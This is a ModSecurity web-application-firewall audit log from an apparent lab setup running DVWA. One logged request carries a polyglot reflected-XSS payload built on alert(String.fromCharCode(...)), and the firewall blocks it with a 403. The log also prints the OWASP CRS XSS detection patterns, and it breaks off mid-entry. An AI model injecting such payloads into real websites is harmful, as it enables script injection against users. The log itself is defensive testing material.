modsec_audit.log

{"transaction":{"time":"13/May/2017:08:39:31 --0400","transaction_id":"WRb@g38AAQEAAAkVV38AAAAA","remote_address":"192.168.75.130","remote_port":46150,"local_address":"192.168.75.136","local_port":80},"request":{"request_line":"GET /dvwa/vulnerabilities/xss_r/ HTTP/1.1","headers":{"Host":"192.168.75.136","User-Agent":"Mozilla/5.0 (X11; Linux x86_64; rv:45.0) Gecko/20100101 Firefox/45.0","Accept":"text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8","Accept-Language":"en-US,en;q=0.5","Accept-Encoding":"gzip, deflate","Referer":"http://192.168.75.136/dvwa/index.php","Cookie":"security=low; PHPSESSID=j4ho0gge83rg7kdh8jf6n2g3p4","Connection":"keep-alive"}},"response":{"protocol":"HTTP/1.1","status":200,"headers":{"Expires":"Tue, 23 Jun 2009 12:00:00 GMT","Cache-Control":"no-cache, must-revalidate","Pragma":"no-cache","Vary":"Accept-Encoding","Content-Encoding":"gzip","Content-Length":"1419","Keep-Alive":"timeout=5, max=100","Connection":"Keep-Alive","Content-Type":"text/html;charset=utf-8"},"body":"\u001F‹\b"},"audit_data":{"messages":["Warning. Pattern match \"^[\\\\d.:]+$\" at REQUEST_HEADERS:Host. [file \"/etc/apache2/modsecurity.d/owasp-modsecurity-crs/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf\"] [line \"793\"] [id \"920350\"] [rev \"2\"] [msg \"Host header is a numeric IP address\"] [data \"192.168.75.136\"] [severity \"WARNING\"] [ver \"OWASP_CRS/3.0.0\"] [maturity \"9\"] [accuracy \"9\"] [tag \"application-multi\"] [tag \"language-multi\"] [tag \"platform-multi\"] [tag \"attack-protocol\"] [tag \"OWASP_CRS/PROTOCOL_VIOLATION/IP_HOST\"] [tag \"WASCTC/WASC-21\"] [tag \"OWASP_TOP_10/A7\"] [tag \"PCI/6.5.10\"]"],"error_messages":["[file \"apache2_util.c\"] [line 273] [level 3] [client 192.168.75.130] ModSecurity: Warning. Pattern match \"^[\\\\\\\\\\\\\\\\d.:]+$\" at REQUEST_HEADERS:Host. [file \"/etc/apache2/modsecurity.d/owasp-modsecurity-crs/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf\"] [line \"793\"] [id \"920350\"] [rev \"2\"] [msg \"Host header is a numeric IP address\"] [data \"192.168.75.136\"] [severity \"WARNING\"] [ver \"OWASP_CRS/3.0.0\"] [maturity \"9\"] [accuracy \"9\"] [tag \"application-multi\"] [tag \"language-multi\"] [tag \"platform-multi\"] [tag \"attack-protocol\"] [tag \"OWASP_CRS/PROTOCOL_VIOLATION/IP_HOST\"] [tag \"WASCTC/WASC-21\"] [tag \"OWASP_TOP_10/A7\"] [tag \"PCI/6.5.10\"] [hostname \"192.168.75.136\"] [uri \"/dvwa/vulnerabilities/xss_r/\"] [unique_id \"WRb@g38AAQEAAAkVV38AAAAA\"]"],"handler":"application/x-httpd-php","stopwatch":{"p1":814,"p2":1881,"p3":83,"p4":541,"p5":71,"sr":35,"sw":0,"l":0,"gc":0},"response_body_dechunked":true,"producer":["ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/)","OWASP_CRS/3.0.0"],"server":"Apache/2.4.18 (Ubuntu)","engine_mode":"ENABLED"}}
{"transaction":{"time":"13/May/2017:08:39:31 --0400","transaction_id":"WRb@g38AAQEAAAkW4REAAAAB","remote_address":"192.168.75.130","remote_port":46152,"local_address":"192.168.75.136","local_port":80},"request":{"request_line":"GET /dvwa/vulnerabilities/xss_r/ HTTP/1.1","headers":{"Host":"192.168.75.136","User-Agent":"Mozilla/5.0 (X11; Linux x86_64; rv:45.0) Gecko/20100101 Firefox/45.0","Accept":"text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8","Accept-Language":"en-US,en;q=0.5","Accept-Encoding":"gzip, deflate","Referer":"http://192.168.75.136/dvwa/index.php","Cookie":"security=low; PHPSESSID=j4ho0gge83rg7kdh8jf6n2g3p4","Connection":"keep-alive"}},"response":{"protocol":"HTTP/1.1","status":200,"headers":{"Expires":"Tue, 23 Jun 2009 12:00:00 GMT","Cache-Control":"no-cache, must-revalidate","Pragma":"no-cache","Vary":"Accept-Encoding","Content-Encoding":"gzip","Content-Length":"1419","Keep-Alive":"timeout=5, max=100","Connection":"Keep-Alive","Content-Type":"text/html;charset=utf-8"},"body":"\u001F‹\b"},"audit_data":{"messages":["Warning. Pattern match \"^[\\\\d.:]+$\" at REQUEST_HEADERS:Host. [file \"/etc/apache2/modsecurity.d/owasp-modsecurity-crs/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf\"] [line \"793\"] [id \"920350\"] [rev \"2\"] [msg \"Host header is a numeric IP address\"] [data \"192.168.75.136\"] [severity \"WARNING\"] [ver \"OWASP_CRS/3.0.0\"] [maturity \"9\"] [accuracy \"9\"] [tag \"application-multi\"] [tag \"language-multi\"] [tag \"platform-multi\"] [tag \"attack-protocol\"] [tag \"OWASP_CRS/PROTOCOL_VIOLATION/IP_HOST\"] [tag \"WASCTC/WASC-21\"] [tag \"OWASP_TOP_10/A7\"] [tag \"PCI/6.5.10\"]"],"error_messages":["[file \"apache2_util.c\"] [line 273] [level 3] [client 192.168.75.130] ModSecurity: Warning. Pattern match \"^[\\\\\\\\\\\\\\\\d.:]+$\" at REQUEST_HEADERS:Host. [file \"/etc/apache2/modsecurity.d/owasp-modsecurity-crs/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf\"] [line \"793\"] [id \"920350\"] [rev \"2\"] [msg \"Host header is a numeric IP address\"] [data \"192.168.75.136\"] [severity \"WARNING\"] [ver \"OWASP_CRS/3.0.0\"] [maturity \"9\"] [accuracy \"9\"] [tag \"application-multi\"] [tag \"language-multi\"] [tag \"platform-multi\"] [tag \"attack-protocol\"] [tag \"OWASP_CRS/PROTOCOL_VIOLATION/IP_HOST\"] [tag \"WASCTC/WASC-21\"] [tag \"OWASP_TOP_10/A7\"] [tag \"PCI/6.5.10\"] [hostname \"192.168.75.136\"] [uri \"/dvwa/vulnerabilities/xss_r/\"] [unique_id \"WRb@g38AAQEAAAkW4REAAAAB\"]"],"handler":"application/x-httpd-php","stopwatch":{"p1":978,"p2":2285,"p3":106,"p4":660,"p5":142,"sr":78,"sw":1,"l":0,"gc":0},"response_body_dechunked":true,"producer":["ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/)","OWASP_CRS/3.0.0"],"server":"Apache/2.4.18 (Ubuntu)","engine_mode":"ENABLED"}}
{"transaction":{"time":"13/May/2017:08:39:53 --0400","transaction_id":"WRb@mX8AAQEAAAkXs94AAAAC","remote_address":"192.168.75.130","remote_port":46160,"local_address":"192.168.75.136","local_port":80},"request":{"request_line":"GET /dvwa/vulnerabilities/xss_r/?name=%27%3Balert%28String.fromCharCode%2888%2C83%2C83%29%29%2F%2F%27%3Balert%28String.fromCharCode%2888%2C83%2C83%29%29%2F%2F%22%3B+alert%28String.fromCharCode%2888%2C83%2C83%29%29%2F%2F%22%3Balert%28String.fromCharCode%2888%2C83%2C83%29%29%2F%2F--+%3E%3C%2FSCRIPT%3E%22%3E%27%3E%3CSCRIPT%3Ealert%28String.fromCharCode%2888%2C83%2C83%29%29%3C%2FSCRIPT%3E HTTP/1.1","headers":{"Host":"192.168.75.136","User-Agent":"Mozilla/5.0 (X11; Linux x86_64; rv:45.0) Gecko/20100101 Firefox/45.0","Accept":"text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8","Accept-Language":"en-US,en;q=0.5","Accept-Encoding":"gzip, deflate","Referer":"http://192.168.75.136/dvwa/vulnerabilities/xss_r/","Cookie":"security=low; PHPSESSID=j4ho0gge83rg7kdh8jf6n2g3p4","Connection":"keep-alive"}},"response":{"protocol":"HTTP/1.1","status":403,"headers":{"Content-Length":"316","Keep-Alive":"timeout=5, max=100","Connection":"Keep-Alive","Content-Type":"text/html; charset=iso-8859-1"},"body":"<!DOCTYPE HTML PUBLIC \"-//IETF//DTD HTML 2.0//EN\">\n<html><head>\n<title>403 Forbidden</title>\n</head><body>\n<h1>Forbidden</h1>\n<p>You don't have permission to access /dvwa/vulnerabilities/xss_r/\non this server.<br />\n</p>\n<hr>\n<address>Apache/2.4.18 (Ubuntu) Server at 192.168.75.136 Port 80</address>\n</body></html>\n"},"audit_data":{"messages":["Warning. Pattern match \"^[\\\\d.:]+$\" at REQUEST_HEADERS:Host. [file \"/etc/apache2/modsecurity.d/owasp-modsecurity-crs/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf\"] [line \"793\"] [id \"920350\"] [rev \"2\"] [msg \"Host header is a numeric IP address\"] [data \"192.168.75.136\"] [severity \"WARNING\"] [ver \"OWASP_CRS/3.0.0\"] [maturity \"9\"] [accuracy \"9\"] [tag \"application-multi\"] [tag \"language-multi\"] [tag \"platform-multi\"] [tag \"attack-protocol\"] [tag \"OWASP_CRS/PROTOCOL_VIOLATION/IP_HOST\"] [tag \"WASCTC/WASC-21\"] [tag \"OWASP_TOP_10/A7\"] [tag \"PCI/6.5.10\"]","Warning. detected XSS using libinjection. [file \"/etc/apache2/modsecurity.d/owasp-modsecurity-crs/rules/REQUEST-941-APPLICATION-ATTACK-XSS.conf\"] [line \"56\"] [id \"941100\"] [rev \"2\"] [msg \"XSS Attack Detected via libinjection\"] [data \"Matched Data: connection found within ARGS:name: ';alert(String.fromCharCode(88,83,83))//';alert(String.fromCharCode(88,83,83))//\\x22; alert(String.fromCharCode(88,83,83))//\\x22;alert(String.fromCharCode(88,83,83))//-- ></SCRIPT>\\x22>'><SCRIPT>alert(String.fromCharCode(88,83,83))</SCRIPT>\"] [severity \"CRITICAL\"] [ver \"OWASP_CRS/3.0.0\"] [maturity \"1\"] [accuracy \"9\"] [tag \"application-multi\"] [tag \"language-multi\"] [tag \"platform-multi\"] [tag \"attack-xss\"] [tag \"OWASP_CRS/WEB_ATTACK/XSS\"] [tag \"WASCTC/WASC-8\"] [tag \"WASCTC/WASC-22\"] [tag \"OWASP_TOP_10/A3\"] [tag \"OWASP_AppSensor/IE1\"] [tag \"CAPEC-242\"]","Warning. Pattern match \"(?i)([<\\xef\\xbc\\x9c]script[^>\\xef\\xbc\\x9e]*[>\\xef\\xbc\\x9e][\\\\s\\\\S]*?)\" at ARGS:name. [file \"/etc/apache2/modsecurity.d/owasp-modsecurity-crs/rules/REQUEST-941-APPLICATION-ATTACK-XSS.conf\"] [line \"91\"] [id \"941110\"] [rev \"2\"] [msg \"XSS Filter - Category 1: Script Tag Vector\"] [data \"Matched Data: <SCRIPT> found within ARGS:name: ';alert(String.fromCharCode(88,83,83))//';alert(String.fromCharCode(88,83,83))//\\x22; alert(String.fromCharCode(88,83,83))//\\x22;alert(String.fromCharCode(88,83,83))//-- ></SCRIPT>\\x22>'><SCRIPT>alert(String.fromCharCode(88,83,83))</SCRIPT>\"] [severity \"CRITICAL\"] [ver \"OWASP_CRS/3.0.0\"] [maturity \"4\"] [accuracy \"9\"] [tag \"application-multi\"] [tag \"language-multi\"] [tag \"platform-multi\"] [tag \"attack-xss\"] [tag \"OWASP_CRS/WEB_ATTACK/XSS\"] [tag \"WASCTC/WASC-8\"] [tag \"WASCTC/WASC-22\"] [tag \"OWASP_TOP_10/A3\"] [tag \"OWASP_AppSensor/IE1\"] [tag \"CAPEC-242\"]","Warning. Pattern match \"(?i)<[^\\\\w<>]*(?:[^<>\\\"'\\\\s]*:)?[^\\\\w<>]*(?:\\\\W*?s\\\\W*?c\\\\W*?r\\\\W*?i\\\\W*?p\\\\W*?t|\\\\W*?f\\\\W*?o\\\\W*?r\\\\W*?m|\\\\W*?s\\\\W*?t\\\\W*?y\\\\W*?l\\\\W*?e|\\\\W*?s\\\\W*?v\\\\W*?g|\\\\W*?m\\\\W*?a\\\\W*?r\\\\W*?q\\\\W*?u\\\\W*?e\\\\W*?e|(?:\\\\W*?l\\\\W*?i\\\\W*?n\\\\W*?k|\\\\W*?o\\\\W*?b\\\\W*?j\\\\W*?e\\ ...\" at ARGS:name. [file \"/etc/apache2/modsecurity.d/owasp-modsecurity-crs/rules/REQUEST-941-APPLICATION-ATTACK-XSS.conf\"] [line \"267\"] [id \"941160\"] [rev \"2\"] [msg \"NoScript XSS InjectionChecker: HTML Injection\"] [data \"Matched Data: </SCRIPT found within ARGS:name: ';alert(String.fromCharCode(88,83,83))//';alert(String.fromCharCode(88,83,83))//\\x22; alert(String.fromCharCode(88,83,83))//\\x22;alert(String.fromCharCode(88,83,83))//-- ></SCRIPT>\\x22>'><SCRIPT>alert(String.fromCharCode(88,83,83))</SCRIPT>\"] [severity \"CRITICAL\"] [ver \"OWASP_CRS/3.0.0\"] [maturity \"1\"] [accuracy \"8\"] [tag \"application-multi\"] [tag \"language-multi\"] [tag \"platform-multi\"] [tag \"attack-xss\"] [tag \"OWASP_CRS/WEB_ATTACK/XSS\"] [tag \"WASCTC/WASC-8\"] [tag \"WASCTC/","Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file \"/etc/apache2/modsecurity.d/owasp-modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf\"] [line \"57\"] [id \"949110\"] [msg \"Inbound Anomaly Score Exceeded (Total Score: 18)\"] [severity \"CRITICAL\"] [tag \"application-multi\"] [tag \"language-multi\"] [tag \"platform-multi\"] [tag \"attack-generic\"]","Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file \"/etc/apache2/modsecurity.d/owasp-modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf\"] [line \"73\"] [id \"980130\"] [msg \"Inbound Anomaly Score Exceeded (Total Inbound Score: 18 - SQLI=0,XSS=15,RFI=0,LFI=0,RCE=0,PHPI=0,HTTP=0,SESS=0): NoScript XSS InjectionChecker: HTML Injection\"] [tag \"event-correlation\"]"],"error_messages":["[file \"apache2_util.c\"] [line 273] [level 3] [client 192.168.75.130] ModSecurity: Warning. Pattern match \"^[\\\\\\\\\\\\\\\\d.:]+$\" at REQUEST_HEADERS:Host. [file \"/etc/apache2/modsecurity.d/owasp-modsecurity-crs/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf\"] [line \"793\"] [id \"920350\"] [rev \"2\"] [msg \"Host header is a numeric IP address\"] [data \"192.168.75.136\"] [severity \"WARNING\"] [ver \"OWASP_CRS/3.0.0\"] [maturity \"9\"] [accuracy \"9\"] [tag \"application-multi\"] [tag \"language-multi\"] [tag \"platform-multi\"] [tag \"attack-protocol\"] [tag \"OWASP_CRS/PROTOCOL_VIOLATION/IP_HOST\"] [tag \"WASCTC/WASC-21\"] [tag \"OWASP_TOP_10/A7\"] [tag \"PCI/6.5.10\"] [hostname \"192.168.75.136\"] [uri \"/dvwa/vulnerabilities/xss_r/\"] [unique_id \"WRb@mX8AAQEAAAkXs94AAAAC\"]","[file \"apache2_util.c\"] [line 273] [level 3] [client 192.168.75.130] ModSecurity: Warning. detected XSS using libinjection. [file \"/etc/apache2/modsecurity.d/owasp-modsecurity-crs/rules/REQUEST-941-APPLICATION-ATTACK-XSS.conf\"] [line \"56\"] [id \"941100\"] [rev \"2\"] [msg \"XSS Attack Detected via libinjection\"] [data \"Matched Data: connection found within ARGS:name: ';alert(String.fromCharCode(88,83,83))//';alert(String.fromCharCode(88,83,83))//\\\\\\\\x22; alert(String.fromCharCode(88,83,83))//\\\\\\\\x22;alert(String.fromCharCode(88,83,83))//-- ></SCRIPT>\\\\\\\\x22>'><SCRIPT>alert(String.fromCharCode(88,83,83))</SCRIPT>\"] [severity \"CRITICAL\"] [ver \"OWASP_CRS/3.0.0\"] [maturity \"1\"] [accuracy \"9\"] [tag \"application-multi\"] [tag \"language-multi\"] [tag \"platform-multi\"] [tag \"attack-xss\"] [tag \"OWASP_CRS/WEB_ATTACK/XSS\"] [tag \"WASCTC/WASC-8\"] [tag \"WASCTC/WASC-22\"] [tag \"OWASP_TOP_10/A3\"] [tag \"OWASP_AppSensor/IE1\"] [tag \"CAPEC-242\"] [hostname \"192.168.75.136\"] [uri \"/dvwa/vulnerabilities/xss_r/\"] [unique_id \"WRb@mX8AAQEAAAkXs94AAAAC\"]","[file \"apache2_util.c\"] [line 273] [level 3] [client 192.168.75.130] ModSecurity: Warning. Pattern match \"(?i)([<\\\\\\\\xef\\\\\\\\xbc\\\\\\\\x9c]script[^>\\\\\\\\xef\\\\\\\\xbc\\\\\\\\x9e]*[>\\\\\\\\xef\\\\\\\\xbc\\\\\\\\x9e][\\\\\\\\\\\\\\\\s\\\\\\\\\\\\\\\\S]*?)\" at ARGS:name. [file \"/etc/apache2/modsecurity.d/owasp-modsecurity-crs/rules/REQUEST-941-APPLICATION-ATTACK-XSS.conf\"] [line \"91\"] [id \"941110\"] [rev \"2\"] [msg \"XSS Filter - Category 1: Script Tag Vector\"] [data \"Matched Data: <SCRIPT> found within ARGS:name: ';alert(String.fromCharCode(88,83,83))//';alert(String.fromCharCode(88,83,83))//\\\\\\\\x22; alert(String.fromCharCode(88,83,83))//\\\\\\\\x22;alert(String.fromCharCode(88,83,83))//-- ></SCRIPT>\\\\\\\\x22>'><SCRIPT>alert(String.fromCharCode(88,83,83))</SCRIPT>\"] [severity \"CRITICAL\"] [ver \"OWASP_CRS/3.0.0\"] [maturity \"4\"] [accuracy \"9\"] [tag \"application-multi\"] [tag \"language-multi\"] [tag \"platform-multi\"] [tag \"attack-xss\"] [tag \"OWASP_CRS/WEB_ATTACK/XSS\"] [tag \"WASCTC/WASC-8\"] [tag \"WASCTC/WASC-22\"] [tag \"OWASP_TOP_10/A3\"] [tag \"OWASP_AppSensor/IE1\"] [tag \"CAPEC-242\"] [hostname \"192.168.75.136\"] [uri \"/dvwa/vulnerabilities/xss_r/\"] [unique_id \"WRb@mX8AAQEAAAkXs94AAAAC\"]","[file \"apache2_util.c\"] [line 273] [level 3] [client 192.168.75.130] ModSecurity: Warning. Pattern match \"(?i)<[^\\\\\\\\\\\\\\\\w<>]*(?:[^<>\\\\\\\\\"'\\\\\\\\\\\\\\\\s]*:)?[^\\\\\\\\\\\\\\\\w<>]*(?:\\\\\\\\\\\\\\\\W*?s\\\\\\\\\\\\\\\\W*?c\\\\\\\\\\\\\\\\W*?r\\\\\\\\\\\\\\\\W*?i\\\\\\\\\\\\\\\\W*?p\\\\\\\\\\\\\\\\W*?t|\\\\\\\\\\\\\\\\W*?f\\\\\\\\\\\\\\\\W*?o\\\\\\\\\\\\\\\\W*?r\\\\\\\\\\\\\\\\W*?m|\\\\\\\\\\\\\\\\W*?s\\\\\\\\\\\\\\\\W*?t\\\\\\\\\\\\\\\\W*?y\\\\\\\\\\\\\\\\W*?l\\\\\\\\\\\\\\\\W*?e|\\\\\\\\\\\\\\\\W*?s\\\\\\\\\\\\\\\\W*?v\\\\\\\\\\\\\\\\W*?g|\\\\\\\\\\\\\\\\W*?m\\\\\\\\\\\\\\\\W*?a\\\\\\\\\\\\\\\\W*?r\\\\\\\\\\\\\\\\W*?q\\\\\\\\\\\\\\\\W*?u\\\\\\\\\\\\\\\\W*?e\\\\\\\\\\\\\\\\W*?e|(?:\\\\\\\\\\\\\\\\W*?l\\\\\\\\\\\\\\\\W*?i\\\\\\\\\\\\\\\\W*?n\\\\\\\\\\\\\\\\W*?k|\\\\\\\\\\\\\\\\W*?o\\\\\\\\\\\\\\\\W*?b\\\\\\\\\\\\\\\\W*?j\\\\\\\\\\\\\\\\W*?e\\\\\\\\ ...\" at ARGS:name. [file \"/etc/apache2/modsecurity.d/owasp-modsecurity-crs/rules/REQUEST-941-APPLICATION-ATTACK-XSS.conf\"] [line \"267\"] [id \"941160\"] [rev \"2\"] [msg \"NoScript XSS InjectionChecker: HTML Injection\"] [data \"Matched Data: </SCRIPT found within ARGS:name: ';alert(String.fromCharCode(88,83,83))//';alert(String.fromCharCode(88,83,83))//\\\\\\\\x22; alert(String.fromCharCode(88,83,83))//\\\\\\\\x22;alert(String.fromCharCode(88,83,83))//-- ></SCRIPT>\\\\\\\\x22>'><SCRIPT>alert(String.fromCharCode(88,83,83))</SCRIPT>\"] [severity \"CRITICAL\"] [ver \"OWASP_CRS/3.0.0\"] [maturity \"1\"] [accuracy \"8\"] [tag \"application-multi\"] [tag \"language-multi\"] [tag \"platform-multi\"] [tag \"attack-xss\"] [tag \"OWASP_CRS/WEB_ATTACK/XSS\"] [tag \"WASCTC/WASC-8\"] [tag \"WASCTC/ [hostname \"192.168.75.136\"] [uri \"/dvwa/vulnerabilities/xss_r/\"] [unique_id \"WRb@mX8AAQEAAAkXs94AAAAC\"]","[file \"apache2_util.c\"] [line 273] [level 3] [client 192.168.75.130] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file \"/etc/apache2/modsecurity.d/owasp-modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf\"] [line \"57\"] [id \"949110\"] [msg \"Inbound Anomaly Score Exceeded (Total Score: 18)\"] [severity \"CRITICAL\"] [tag \"application-multi\"] [tag \"language-multi\"] [tag \"platform-multi\"] [tag \"attack-generic\"] [hostname \"192.168.75.136\"] [uri \"/dvwa/vulnerabilities/xss_r/\"] [unique_id \"WRb@mX8AAQEAAAkXs94AAAAC\"]","[file \"apache2_util.c\"] [line 273] [level 3] [client 192.168.75.130] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file \"/etc/apache2/modsecurity.d/owasp-modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf\"] [line \"73\"] [id \"980130\"] [msg \"Inbound Anomaly Score Exceeded (Total Inbound Score: 18 - SQLI=0,XSS=15,RFI=0,LFI=0,RCE=0,PHPI=0,HTTP=0,SESS=0): NoScript XSS InjectionChecker: HTML Injection\"] [tag \"event-correlation\"] [hostname \"192.168.75.136\"] [uri \"/dvwa/vulnerabilities/xss_r/\"] [unique_id \"WRb@mX8AAQEAAAkXs94AAAAC\"]"],"action":{"intercepted":true,"phase":2,"message":"Operator GE matched 5 at TX:anomaly_score."},"stopwatch":{"p1":689,"p2":3261,"p3":0,"p4":0,"p5":131,"sr":34,"sw":1,"l":0,"gc":0},"response_body_dechunked":true,"producer":["ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/)","OWASP_CRS/3.0.0"],"server":"Apache/2.4.18 (Ubuntu)","engine_mode":"ENABLED"}}
{"transaction":{"time":"13/May/2017:08:47:05 --0400","transaction_id":"WRcASX8AAQEAAAkYuD8AAAAD","remote_address":"127.0.0.1","remote_port":41700,"local_address":"127.0.0.1","local_port":80},"request":{"request_line":"GET /EyesOfArgus/ HTTP/1.1","headers":{"Host":"127.0.0.1","User-Agent":"Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:53.0) Gecko/20100101 Firefox/53.0","Accept":"text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8","Accept-Language":"en-US,en;q=0.5","Accept-Encoding":"gzip, deflate","Connection":"keep-alive","Upgrade-Insecure-Requests":"1","If-Modified-Since":"Wed, 10 May 2017 02:17:21 GMT","If-None-Match":"\"cca-54f22127f468d-gzip\""}},"response":{"protocol":"HTTP/1.1","status":200,"headers":{"Last-Modified":"Wed, 10 May 2017 02:17:21 GMT","ETag":"\"cca-54f22127f468d-gzip\"","Accept-Ranges":"bytes","Vary":"Accept-Encoding","Content-Encoding":"gzip","Content-Length":"1210","Keep-Alive":"timeout=5, max=100","Connection":"Keep-Alive","Content-Type":"text/html"},"body":"\u001F‹\b"},"audit_data":{"messages":["Warning. Pattern match \"^[\\\\d.:]+$\" at REQUEST_HEADERS:Host. [file \"/etc/apache2/modsecurity.d/owasp-modsecurity-crs/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf\"] [line \"793\"] [id \"920350\"] [rev \"2\"] [msg \"Host header is a numeric IP address\"] [data \"127.0.0.1\"] [severity \"WARNING\"] [ver \"OWASP_CRS/3.0.0\"] [maturity \"9\"] [accuracy \"9\"] [tag \"application-multi\"] [tag \"language-multi\"] [tag \"platform-multi\"] [tag \"attack-protocol\"] [tag \"OWASP_CRS/PROTOCOL_VIOLATION/IP_HOST\"] [tag \"WASCTC/WASC-21\"] [tag \"OWASP_TOP_10/A7\"] [tag \"PCI/6.5.10\"]"],"error_messages":["[file \"apache2_util.c\"] [line 273] [level 3] [client 127.0.0.1] ModSecurity: Warning. Pattern match \"^[\\\\\\\\\\\\\\\\d.:]+$\" at REQUEST_HEADERS:Host. [file \"/etc/apache2/modsecurity.d/owasp-modsecurity-crs/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf\"] [line \"793\"] [id \"920350\"] [rev \"2\"] [msg \"Host header is a numeric IP address\"] [data \"127.0.0.1\"] [severity \"WARNING\"] [ver \"OWASP_CRS/3.0.0\"] [maturity \"9\"] [accuracy \"9\"] [tag \"application-multi\"] [tag \"language-multi\"] [tag \"platform-multi\"] [tag \"attack-protocol\"] [tag \"OWASP_CRS/PROTOCOL_VIOLATION/IP_HOST\"] [tag \"WASCTC/WASC-21\"] [tag \"OWASP_TOP_10/A7\"] [tag \"PCI/6.5.10\"] [hostname \"127.0.0.1\"] [uri \"/EyesOfArgus/\"] [unique_id \"WRcASX8AAQEAAAkYuD8AAAAD\"]"],"stopwatch":{"p1":784,"p2":1763,"p3":63,"p4":523,"p5":54,"sr":62,"sw":0,"l":0,"gc":0},"response_body_dechunked":true,"producer":["ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/)","OWASP_CRS/3.0.0"],"server":"Apache/2.4.18 (Ubuntu)","engine_mode":"ENABLED"}}
{"transaction":{"time":"13/May/2017:08:47:05 --0400","transaction_id":"WRcASX8AAQEAAAkYuEAAAAAD","remote_address":"127.0.0.1","remote_port":41700,"local_address":"127.0.0.1","local_port":80},"request":{"request_line":"GET /EyesOfArgus/flare.json HTTP/1.1","headers":{"Host":"127.0.0.1","User-Agent":"Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:53.0) Gecko/20100101 Firefox/53.0","Accept":"application/json,*/*","Accept-Language":"en-US,en;q=0.5","Accept-Encoding":"gzip, deflate","Referer":"http://127.0.0.1/EyesOfArgus/","Connection":"keep-alive","If-Modified-Since":"Thu, 11 May 2017 01:54:25 GMT","If-None-Match":"\"107-54f35de4f1afb\""}},"response":{"protocol":"HTTP/1.1","status":200,"headers":{"Last-Modified":"Sat, 13 May 2017 12:47:03 GMT","ETag":"\"107-54f6738077c82\"","Accept-Ranges":"bytes","Content-Length":"263","Keep-Alive":"timeout=5, max=99","Connection":"Keep-Alive","Content-Type":"application/json"},"body":""},"audit_data":{"messages":["Warning. Pattern match \"^[\\\\d.:]+$\" at REQUEST_HEADERS:Host. [file \"/etc/apache2/modsecurity.d/owasp-modsecurity-crs/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf\"] [line \"793\"] [id \"920350\"] [rev \"2\"] [msg \"Host header is a numeric IP address\"] [data \"127.0.0.1\"] [severity \"WARNING\"] [ver \"OWASP_CRS/3.0.0\"] [maturity \"9\"] [accuracy \"9\"] [tag \"application-multi\"] [tag \"language-multi\"] [tag \"platform-multi\"] [tag \"attack-protocol\"] [tag \"OWASP_CRS/PROTOCOL_VIOLATION/IP_HOST\"] [tag \"WASCTC/WASC-21\"] [tag \"OWASP_TOP_10/A7\"] [tag \"PCI/6.5.10\"]"],"error_messages":["[file \"apache2_util.c\"] [line 273] [level 3] [client 127.0.0.1] ModSecurity: Warning. Pattern match \"^[\\\\\\\\\\\\\\\\d.:]+$\" at REQUEST_HEADERS:Host. [file \"/etc/apache2/modsecurity.d/owasp-modsecurity-crs/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf\"] [line \"793\"] [id \"920350\"] [rev \"2\"] [msg \"Host header is a numeric IP address\"] [data \"127.0.0.1\"] [severity \"WARNING\"] [ver \"OWASP_CRS/3.0.0\"] [maturity \"9\"] [accuracy \"9\"] [tag \"application-multi\"] [tag \"language-multi\"] [tag \"platform-multi\"] [tag \"attack-protocol\"] [tag \"OWASP_CRS/PROTOCOL_VIOLATION/IP_HOST\"] [tag \"WASCTC/WASC-21\"] [tag \"OWASP_TOP_10/A7\"] [tag \"PCI/6.5.10\"] [hostname \"127.0.0.1\"] [uri \"/EyesOfArgus/flare.json\"] [unique_id \"WRcASX8AAQEAAAkYuEAAAAAD\"]"],"stopwatch":{"p1":614,"p2":987,"p3":52,"p4":157,"p5":49,"sr":21,"sw":0,"l":0,"gc":0},"response_body_dechunked":true,"producer":["ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/)","OWASP_CRS/3.0.0"],"server":"Apache/2.4.18 (Ubuntu)","engine_mode":"ENABLED"}}
{"transaction":{"time":"13/May/2017:08:47:05 --0400","transaction_id":"WRcASX8AAQEAAAkYuEEAAAAD","remote_address":"127.0.0.1","remote_port":41700,"local_address":"127.0.0.1","local_port":80},"request":{"request_line":"GET /favicon.ico HTTP/1.1","headers":{"Host":"127.0.0.1","User-Agent":"Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:53.0) Gecko/20100101 Firefox/53.0","Accept":"*/*","Accept-Language":"en-US,en;q=0.5","Accept-Encoding":"gzip, deflate","Connection":"keep-alive"}},"response":{"protocol":"HTTP/1.1","status":404,"headers":{"Content-Length":"284","Keep-Alive":"timeout=5, max=98","Connection":"Keep-Alive","Content-Type":"text/html; charset=iso-8859-1"},"body":"<!DOCTYPE HTML PUBLIC \"-//IETF//DTD HTML 2.0//EN\">\n<html><head>\n<title>404 Not Found</title>\n</head><body>\n<h1>Not Found</h1>\n<p>The requested URL /favicon.ico was not found on this server.</p>\n<hr>\n<address>Apache/2.4.18 (Ubuntu) Server at 127.0.0.1 Port 80</address>\n</body></html>\n"},"audit_data":{"messages":["Warning. Pattern match \"^[\\\\d.:]+$\" at REQUEST_HEADERS:Host. [file 